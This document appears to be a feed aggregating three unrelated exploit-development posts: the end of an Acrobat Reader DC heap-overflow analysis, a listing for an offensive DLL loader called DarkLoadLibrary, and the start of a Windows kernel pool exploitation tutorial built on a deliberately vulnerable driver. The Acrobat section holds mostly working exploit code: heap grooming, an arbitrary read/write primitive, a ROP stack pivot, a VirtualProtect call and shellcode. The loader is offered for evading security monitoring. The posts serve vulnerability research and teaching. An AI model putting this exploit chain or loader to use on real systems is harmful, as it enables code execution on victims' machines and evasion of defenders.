        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the *Code Analysis* section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

☑ ★ ✇ KitPloit - PenTest & Hacking Tools

DarkLoadLibrary - LoadLibrary For Offensive Operations

By: Zion3R


LoadLibrary for offensive operations.


How does is work?

https://www.mdsec.co.uk/2021/06/bypassing-image-load-kernel-callbacks/


Usage
DARKMODULE DarkModule = DarkLoadLibrary(
LOAD_LOCAL_FILE, // control flags
L"TestDLL.dll", // local dll path, if loading from disk
NULL, // DLL Buffer to load from if loading from memory
0, // dll size if loading from memory
NULL // dll name if loaded from memory
);

Control Flags:
  • LOAD_LOCAL_FILE - Load a DLL from the file system.
  • LOAD_MEMORY - Load a DLL from a buffer.
  • NO_LINK - Don't link this module to the PEB, just execute it.

DLL Path:

This can be any path that CreateFileW will open.


DLL Buffer:

This argument is only needed when LOAD_MEMORY is set. In that case this argument should be the buffer containing the DLL.


DLL Size:

This argument is only needed when LOAD_MEMORY is set. In that case this argument should be the size of the buffer containing the DLL.


DLL Name:

This argument is only needed when LOAD_MEMORY is set. In that case this argument should be the name which the DLL should be set in the PEB under.


Considerations

The windows loader is very complex and can handle all the edge case's and intricacies of loading DLLs. There are going to be edge case's which I have not had the time to discover, reverse engineer and implement. So there's going to be DLLs that this loader simply will not work with.

That being said I plan on making this loader as complete as possible, so please open issue's for DLLs that are not correctly loaded.



☑ ★ ✇ Connor McGarr

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 1

By: Connor McGarr

Introduction

I am writing this blog as I am finishing up an amazing training from HackSys Team. This training finally demystified the pool on Windows for myself - something that I have always shied away from. During the training I picked up a lot of pointers (pun fully intended) on everything from an introduction to the kernel low fragmentation heap (kLFH) to pool grooming. As I use blogging as a mechanism for myself to not only share what I know, but to reinforce concepts by writing about them, I wanted to leverage the HackSys Extreme Vulnerable Driver and the win10-klfh branch (HEVD) to chain together two vulnerabilities in the driver from a low-integrity process - an out-of-bounds read and a pool overflow to achieve an arbitrary read/write primitive. This blog, part 1 of this series, will outline the out-of-bounds read and kASLR bypass from low integrity.

Low integrity processes and AppContainer protected processes, such as a browser sandbox, prevent Windows API calls such as EnumDeviceDrivers and NtQuerySystemInformation, which are commonly leveraged to retrieve the base address for ntoskrnl.exe and/or other drivers for kernel exploitation. This stipulation requires a generic kASLR bypass, as was common in the RS2 build of Windows via GDI objects, or some type of vulnerability. With generic kASLR bypasses now not only being very scarce and far-and-few between, information leaks, such as an out-of-bounds read, are the de-facto standard for bypassing kASLR from something like a browser sandbox.

This blog will touch on the basic internals of the pool on Windows, which is already heavily documented much better than any attempt I can make, the implications of the kFLH, from an exploit development perspective, and leveraging out-of-bounds read vulnerabilities.

Windows Pool Internals - tl;dr Version

This section will cover a bit about some pre-segment heap internals as well as how the segment heap works after 19H1. First, Windows exposes the API ExAllocatePoolWithTag, the main API used for pool allocations, which kernel mode drivers can allocate dynamic memory from, such as malloc from user mode. However, drivers targeting Windows 10 2004 or later, according to Microsoft, must use ExAllocatePool2 instead ofExAllocatePoolWithTag, which has apparently been deprecated. For the purposes of this blog we will just refer to the “main allocation function” as ExAllocatePoolWithTag. One word about the “new” APIs is that they will initialize allocate pool chunks to zero.

Continuing on, ExAllocatePoolWithTag’s prototype can be seen below.

The first parameter of this function is POOL_TYPE, which is of type enumeration, that specifies the type of memory to allocate. These values can be seen below.

Although there are many different types of allocations, notice how all of them, for the most part, are prefaced with NonPagedPool or PagedPool. This is because, on Windows, pool allocations come from these two pools (or they come from the session pool, which is beyond the scope of this post and is leveraged by win32k.sys). In user mode, developers have the default process heap to allocate chunks from or they can create their own private heaps as well. The Windows pool works a little different, as the system predefines two pools (for our purposes) of memory for servicing requests in the kernel. Recall also that allocations in the paged pool can be paged out of memory. Allocations in the non-paged pool will always be paged in memory. This basically means memory in the NonPagedPool/NonPagedPoolNx is always accessible. This caveat also means that the non-paged pool is a more “expensive” resource and should be used accordingly.

As far as pool chunks go, the terminology is pretty much on point with a heap chunk, which I talked about in a previous blog on browser exploitation. Each pool chunk is prepended with a 0x10 byte _POOL_HEADER structure on 64-bit system, which can be found using WinDbg.

This structure contains metadata about the in-scope chunk. One interesting thing to note is that when a _POOL_HEADER structure is freed and it isn’t a valid header, a system crash will occur.

The ProcessBilled member of this structure is a pointer to the _EPROCESS object which made the allocation, but only if PoolQuota was set in the PoolType parameter of ExAllocatePoolWithTag. Notice that at an offset of 0x8 in this structure there is a union member, as it is clean two members reside at offset 0x8.

As a test, let’s set a breakpoint on nt!ExAllocatePoolWithTag. Since the Windows kernel will constantly call this function, we don’t need to create a driver that calls this function, as the system will already do this.

After setting a breakpoint, we can execute the function and examine the return value, which is the pool chunk that is allocated.

Notice how the ProcessBilled member isn’t a valid pointer to an _EPROCESS object. This is because this is a vanilla call to nt!ExAllocatePoolWithTag, without any scheduling quota madness going on, meaning the ProcessBilled member isn’t set. Since the AllocatorBackTraceIndex and PoolTagHash are obviously stored in a union, based on the fact that both the ProcessBilled and AllocatorBackTraceIndex members are at the same offset in memory, the two members AllocatorBackTraceIndex and PoolTagHash are actually “carried over” into the ProcessBilled member. This won’t affect anything, since the ProcessBilled member isn’t accounted for due to the fact that PoolQuota wasn’t set in the PoolType parameter, and this is how WinDbg interprets the memory layout. If the PoolQuota was set, the EPROCESS pointer is actually XOR’d with a random “cookie”, meaning that if you wanted to reconstruct this header you would need to first leak the cookie. This information will be useful later on in the pool overflow vulnerability in part 2, which will not leverage PoolQuota.

Let’s now talk about the segment heap. The segment heap, which was already instrumented in user mode, was implemented into the Windows kernel with the 19H1 build of Windows 10. The “gist” of the segment heap is this: when a component in the kernel requests some dynamic memory, via on the the previously mentioned API calls, there are now a few options, namely four of them, that can service the request. The are:

  1. Low Fragmentation Heap (kLFH)
  2. Variable Size (VS)
  3. Segment Alloc
  4. Large Alloc

Each pool is now managed by a _SEGMENT_HEAP structure, as seen below, which provides references to various “segments” in use for the pool and contains metadata for the pool.

The vulnerabilities mentioned in this blog post will be revolving around the kLFH, so for the purposes of this post I highly recommend reading this paper to find out more about the internals of each allocator and to view Yarden Shafir’s upcoming BlackHat talk on pool internals in the age of the segment heap!

For the purposes of this exploit and as a general note, let’s talk about how the _POOL_HEADER structure is used.

We talked about the _POOL_HEADER structure earlier - but let’s dig a big deeper into that concept to see if/when it is even used when the segment heap is enabled.

Any size allocation that cannot fit into a Variable Size segment allocation will pretty much end up in the kLFH. What is interesting here is that the _POOL_HEADER structure is no longer used for chunks within the VS segment. Chunks allocated using the VS segment are actually preceded prefaces with a header structure called _HEAP_VS_CHUNK_HEADER, which was pointed out to me by my co-worker Yarden Shafir. This structure can be seen in WinDbg.

The interesting fact about the pool headers with the segment heap is that the kLFH, which will be the target for this post, actually still use _POOL_HEADER structures to preface pool chunks.

Chunks allocated by the kLFH and VS segments are are shown below.

Why does this matter? For the purposes of exploitation in part 2, there will be a pool overflow at some point during exploitation. Since we know that pool chunks are prefaced with a header, and because we know that an invalid header will cause a crash, we need to be mindful of this. Using our overflow, we will need to make sure that a valid header is present during exploitation. Since our exploit will be targeting the kLFH, which still uses the standard _POOL_HEADER structure with no encoding, this will prove to be rather trivial later. _HEAP_VS_CHUNK_HEADER, however, performs additional encoding on its members.

The “last piece of this puzzle” is to understand how we can force the system to allocate pool chunks via the kLFH segment. The kLFH services requests that range in size from 1 byte to 16,368 bytes. The kLFH segment is also managed by the _HEAP_LFH_CONTEXT structure, which can be dumped in WinDbg.

The kLFH has “buckets” for each allocation size. The tl;dr here is if you want to trigger the kLFH you need to make 16 consecutive requests to the same size bucket. There are 129 buckets, and each bucket has a “granularity”. Let’s look at a chart to see the determining factors in where an allocation resides in the kLFH, based on size, which was taken from the previously mentioned paper from Corentin and Paul.

This means that any allocation that is a 16 byte granularity (e.g. 1-16 bytes, 17-31 bytes, etc.) up until a 64 byte granularity are placed into buckets 1-64, starting with bucket 1 for allocations of 1-16 bytes, bucket 2 for 17-31 bytes, and so on, up until a 512 byte granularity. Anything larger is either serviced by the VS segment or other various components of the segment heap.

Let’s say we perform a pool spray of objects which are 0x40 bytes and we do this 100 times. We can expect that most of these allocations will get stored in the kLFH, due to the heuristics of 16 consecutive allocations and because the size matches one of the buckets provided by kLFH. This is very useful for exploitation, as it means there is a good chance we can groom the pool with relatively well. Grooming refers to the fact we can get a lot of pool chunks, which we control, lined up adjacently next to each other in order to make exploitation reliable. For example, if we can groom the pool with objects we control, one after the other, we can ensure that a pool overflow will overflow data which we control, leading to exploitation. We will touch a lot more on this in the future.

kLFH also uses these predetermined buckets to manage chunks. This also removes something known as coalescing, which is when the pool manager combines multiple free chunks into a bigger chunk for performance. Now, with the kLFH, because of the architecture, we know that if we free an object in the kLFH, we can expect that the free will remain until it is used again in an allocation for that specific sized chunk! For example, if we are working in bucket 1, which can hold anything from 1 byte to 1008 bytes, and we allocate two objects of the size 1008 bytes and then we free these objects, the pool manager will not combine these slots because that would result in a free chunk of 2016 bytes, which doesn’t fit into the bucket, which can only hold 1-1008 bytes. This means the kLFH will keep these slots free until the next allocation of this size comes in and uses it. This also will be useful later on.

However, what are the drawbacks to the kLFH? Since the kLFH uses predetermined sizes we need to be very luck to have a driver allocate objects which are of the same size as a vulnerable object which can be overflowed or manipulated. Let’s say we can perform a pool overflow into an adjacent chunk as such, in this expertly crafted Microsoft Paint diagram.

If this overflow is happening in a kLFH bucket on the NonPagedPoolNx, for instance, we know that an overflow from one chunk will overflow into another chunk of the EXACT same size. This is because of the kLFH buckets, which predetermine which sizes are allowed in a bucket, which then determines what sizes adjacent pool chunks are. So, in this situation (and as we will showcase in this blog) the chunk that is adjacent to the vulnerable chunk must be of the same size as the chunk and must be allocated on the same pool type, which in this case is the NonPagedPoolNx. This severely limits the scope of objects we can use for grooming, as we need to find objects, whether they are typedef objects from a driver itself or a native Windows object that can be allocated from user mode, that are the same size as the object we are overflowing. Not only that, but the object must also contain some sort of interesting member, like a function pointer, to make the overflow worthwhile. This means now we need to find objects that are capped at a certain size, allocated in the same pool, and contain something interesting.

The last thing to say before we get into the out-of-bounds read is that some of the elements of this exploit are slightly contrived to outline successful exploitation. I will say, however, I have seen drivers which allocate pool memory, let unauthenticated clients specify the size of the allocation, and then return the contents to user mode - so this isn’t to say that there are not poorly written drivers out there. I do just want to call out, however, this post is more about the underlying concepts of pool exploitation in the age of the segment heap versus some “new” or “novel” way to bypass some of the stipulations of the segment heap. Now, let’s get into exploitation.

From Out-Of-Bounds-Read to kASLR bypass - Low-Integrity Exploitation

Let’s take a look at the file in HEVD called MemoryDisclosureNonPagedPoolNx.c. We will start with the code and eventually move our way into dynamic analysis with WinDbg.

The above snippet of code is a function which is defined as TriggerMemoryDisclosureNonPagedPoolNx. This function has a return type of NTSTATUS. This code invokes ExAllocatePoolWithTag and creates a pool chunk on the NonPagedPoolNx kernel pool of size POOL_BUFFER_SIZE and with the pool tag POOL_TAG. Tracing the value of POOL_BUFFER_SIZE in MemoryDisclosureNonPagedPoolNx.h, which is included in the MemoryDisclosureNonPagedPoolNx.c file, we can see that the pool chunk allocated here is 0x70 bytes in size. POOL_TAG is also included in Common.h as kcaH, which is more humanly readable as Hack.

After the pool chunk is allocated in the NonPagedPoolNx it is filled with 0x41 characters, 0x70 of them to be precise, as seen in the call to RtlFillMemory. There is no vulnerability here yet, as nothing so far is influenced by a client invoking an IOCTL which would reach this routine. Let’s continue down the code to see what happens.

After initializing the buffer to a value of 0x70 0x41 characters, the first defined parameter in TriggerMemoryDisclosureNonPagedPoolNx, which is PVOID UserOutputBuffer, is part of a ProbeForWrite routine to ensure this buffer resides in user mode. Where does UserOutputBuffer come from (besides it’s obvious name)? Let’s view where the function TriggerMemoryDisclosureNonPagedPoolNx is actually invoked from, which is at the end of MemoryDisclosureNonPagedPoolNx.c.

We can see that the first argument passed to TriggerMemoryDisclosureNonPagedPoolNx, which is the function we have been analyzing thus far, is passed an argument called UserOutputBuffer. This variable comes from the I/O Request Packet (IRP) which was passed to the driver and created by a client invoking DeviceIoControl to interact with the driver. More specifically, this comes from the IO_STACK_LOCATION structure, which always accompanies an IRP. This structure contains many members and data used by the IRP to pass information to the driver. In this case, the associated IO_STACK_LOCATION structure contains most of the parameters used by the client in the call to DeviceIoControl. The IRP structure itself contains the UserBuffer parameter, which is actually the output buffer supplied by a client using DeviceIoControl. This means that this buffer will be bubbled back up to user mode, or any client for that matter, which sends an IOCTL code that reaches this routine. I know this seems like a mouthful right now, but I will give the “tl;dr” here in a second.

Essentially what happens here is a user-mode client can specify a size and a buffer, which will get used in the call to TriggerMemoryDisclosureNonPagedPoolNx. Let’s then take a quick look back at the image from two images ago, which has again been displayed below for brevity.

Skipping over the #ifdef SECURE directive, which is obviously what a “secure” driver should use, we can see that if the allocation of the pool chunk we previously mentioned, which is of size POOL_BUFFER_SIZE, or 0x70 bytes, is successful - the contents of the pool chunk are written to the UserOutputBuffer variable, which will be returned to the client invoking DeviceIoControl, and the amount of data copied to this buffer is actually decided by the client via the nOutBufferSize parameter.

What is the issue here? ExAllocatePoolWithTag will allocate a pool chunk based on the size provided here by the client. The issue is that the developer of this driver is not just copying the output to the UserOutputBuffer parameter but that the call to RtlCopyMemory allows the client to decide the amount of bytes written to the UserOutputBuffer parameter. This isn’t an issue of a buffer overflow on the UserOutputBuffer part, as we fully control this buffer via our call to DeviceIoControl, and can make it a large buffer to avoid it being overflowed. The issue is the second and third parameter.

The pool chunk allocated in this case is 0x70 bytes. If we look at the #ifdef SECURE directive, we can see that the KernelBuffer created by the call to ExAllocatePoolWithTag is copied to the UserOutputBuffer parameter and NOTHING MORE, as defined by the POOL_BUFFER_SIZE parameter. Since the allocation created is only POOL_BUFFER_SIZE, we should only allow the copy operation to copy this many bytes.

If a size greater than 0x70, or POOL_BUFFER_SIZE, is provided to the RtlCopyMemory function, then the adjacent pool chunk right after the KernelBuffer pool chunk would also be copied to the UserOutputBuffer. The below diagram outlines.

If the size of the copy operation is greater than the allocation size of0x70 bytes, the number of bytes after 0x70 are taken from the adjacent chunk and are also bubbled back up to user mode. In the case of supplying a value of 0x100 in the size parameter, which is controllable by the caller, the 0x70 bytes from the allocation would be copied back into user and the next 0x30 bytes from the adjacent chunk would also be copied back into user mode. Let’s verify this in WinDbg.

For brevity sake, the routine to reach this code is via the IOCTL 0x0022204f. Here is the code we are going to send to the driver.

We can start by setting a breakpoint on HEVD!TriggerMemoryDisclosureNonPagedPoolNx

Per the __fastcall calling convention the two arguments passed to TriggerMemoryDisclosureNonPagedPoolNx will be in RCX (the UserOutputBuffer) parameter and RDX (the size specified by us). Dumping the RCX register, we can see the 70 bytes that will hold the allocation.

We can then set a breakpoint on the call to nt!ExAllocatePoolWithTag.

g

After executing the call, we can then inspect the return value in RAX.

Interesting! We know the IOCTL code in this case allocated a pool chunk of 0x70 bytes, but every allocation in the pool our chunk resides in, which is denoted with the asterisk above, is actually 0x80 bytes. Remember - each chunk in the kLFH is prefaced with a _POOL_HEADER structure. We can validate this below by ensuring the offset to the PoolTag member of _POOL_HEADER is successful.

The total size of this pool chunk with the header is 0x80 bytes. Recall earlier when we spoke about the kLFH that this size allocation would fall within the kLFH! We know the next thing the code will do in this situation is to copy 0x41 values into the newly allocated chunk. Let’s set a breakpoint on HEVD!memset, which is actually just what the RtlFillMemory macro defaults to.

Inspecting the return value, we can see the buffer was initialized to 0x41 values.

The next action, as we can recall, is the copying of the data from the newly allocated chunk to user mode. Setting a breakpoint on the HEVD!memcpy call, which is the actual function the macro RtlCopyMemory will call, we can inspect RCX, RDX, and R8, which will be the destination, source, and size respectively.

Notice the value in RCX, which is a user-mode address (and the address of our output buffer supplied by DeviceIoControl), is different than the original value shown. This is simply because I had to re-run the POC trigger between the original screenshot and the current. Other than that, nothing else has changed.

After stepping through the memcpy call we can clearly see the contents of the pool chunk are returned to user mode.

Perfect! This is expected behavior by the driver. However, let’s try increasing the size of the output buffer and see what happens, per our hypothesis on this vulnerability. This time, let’s set the output buffer to 0x100.

This time, let’s just inspect the memcpy call.

Take note of the above highlighted content after the 0x41 values.

Let’s now check out the pool chunks in this pool and view the adjacent chunk to our Hack pool chunk.

Last time we performed the IOCTL invocation only values of 0x41 were bubbled back up to user mode. However, recall this time we specified a value of 0x100. This means this time we should also be returning the next 0x30 bytes after the Hack pool chunk back to user mode. Taking a look at the previous image, which shows that the direct next chunk after the Hack chunk is 0xffffe48f4254fb00, which contains a value of 6c54655302081b00 and so on, which is the _POOL_HEADER for the next chunk, as seen below.

These 0x10 bytes, plus the next 0x20 bytes should be returned to us in user mode, as we specified we want to go beyond the bounds of the pool chunk, hence an “out-of-bounds read”. Executing the POC, we can see this is the case!

Awesome! We can see, minus some of the endianness madness that is occurring, we have successfully read memory from the adjacent chunk! This is very useful, but remember what our goal is - we want to bypass kASLR. This means we need to leak some sort of pointer either from the driver or ntoskrnl.exe itself. How can we achieve this if all we can leak is the next adjacent pool chunk? To do this, we need to perform some additional steps to ensure that, while we are in the kLFH segment, that the adjacent chunk(s) always contain some sort of useful pointer that can be leaked by us. This process is called “pool grooming”

Taking The Dog To The Groomer

Up until this point we know we can read data from adjacent pool chunks, but as of now there isn’t really anything interesting next to these chunks. So, how do we combat this? Let’s talk about a few assumptions here:

  1. We know that if we can choose an object to read from, this object will need to be 0x70 bytes in size (0x80 when you include the _POOL_HEADER)
  2. This object needs to be allocated on the NonPagedPoolNx directly after the chunk allocated by HEVD in MemoryDisclosureNonPagedPoolNx
  3. This object needs to contain some sort of useful pointer

How can we go about doing this? Let’s sort of visualize what the kLFH does in order to service requests of 0x70 bytes (technically 0x80 with the header). Please note that the following diagram is for visual purposes only.

As we can see, there are several free slots within this specific page in the pool. If we allocated an object of size 0x80 (technically 0x70, where the _POOL_HEADER is dynamically created) we have no way to know, or no way to force the allocation to occur at a predictable location. That said, the kLFH may not even be enabled at all, due to the heuristic requirement of 16 consecutive allocations to the same size. Where does this leave us? Well, what we can do is to first make sure the kLFH is enabled and then also to “fill” all of the “holes”, or freed allocations currently, with a set of objects. This will force the memory manager to allocate a new page entirely to service new allocations. This process of the memory manager allocating a new page for future allocations within the the kLFH bucket is ideal, as it gives us a “clean slate” to start on without random free chunks that could be serviced at random intervals. We want to do this before we invoke the IOCTL which triggers the TriggerMemoryDisclosureNonPagedPoolNx function in MemoryDisclosureNonPagedPoolNx.c. This is because we want the allocation for the vulnerable pool chunk, which will be the same size as the objects we use for “spraying” the pool to fill the holes, to end up in the same page as the sprayed objects we have control over. This will allow us to groom the pool and make sure that we can read from a chunk that contains some useful information.

Let’s recall the previous image which shows where the vulnerable pool chunk ends up currently.

Organically, without any grooming/spraying, we can see that there are several other types of objects in this page. Notably we can see several Even tags. This tag is actually a tag used for an object created with a call to CreateEvent, a Windows API, which can actually be invoked from user mode. The prototype can be seen below.

This function returns a handle to the object, which is a technically a pool chunk in kernel mode. This is reminiscent of when we obtain a handle to the driver for the call to CreateFile. The handle is an intermediary object that we can interact with from user mode, which has a kernel mode component.

Let’s update the code to leverage CreateEventA to spray an arbitrary amount of objects, 5000.

After executing the newly updated code and after setting a breakpoint on the copy location, with the vulnerable pool chunk, take a look at the state of the page which contains the pool chunk.

This isn’t in an ideal state yet, but notice how we have influenced the page’s layout. We can see now that there are many free objects and a few event objects. This is reminiscent behavior of us getting a new page for our vulnerable chunk to go, as our vulnerable chunk is prefaces with several event objects, with our vulnerable chunk being allocated directly after. We can also perform additional analysis by inspecting the previous page (recall that for our purposes on this 64-bit Windows 10 install a page is 0x1000 bytes, of 4KB).

It seems as though all of the previous chunks that were free have been filled with event objects!

Notice, though, that the pool layout is not perfect. This is due to other components of the kernel also leveraging the kLFH bucket for 0x70 byte allocations (0x80 with the _POOL_HEADER).

Now that we know we can influence the behavior of the pool from spraying, the goal now is to now allocate the entire new page with event objects and then free every other object in the page we control in the new page. This will allow us to then, right after freeing every other object, to create another object of the same size as the event object(s) we just freed. By doing this, the kLFH, due to optimization, will fill the free slots with the new objects we allocate. This is because the current page is the only page that should have free slots available in the NonPagedPoolNx for allocations that are being serviced by the kLFH for size 0x70 (0x80 including the header).

We would like the pool layout to look like this (for the time being):

EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT 

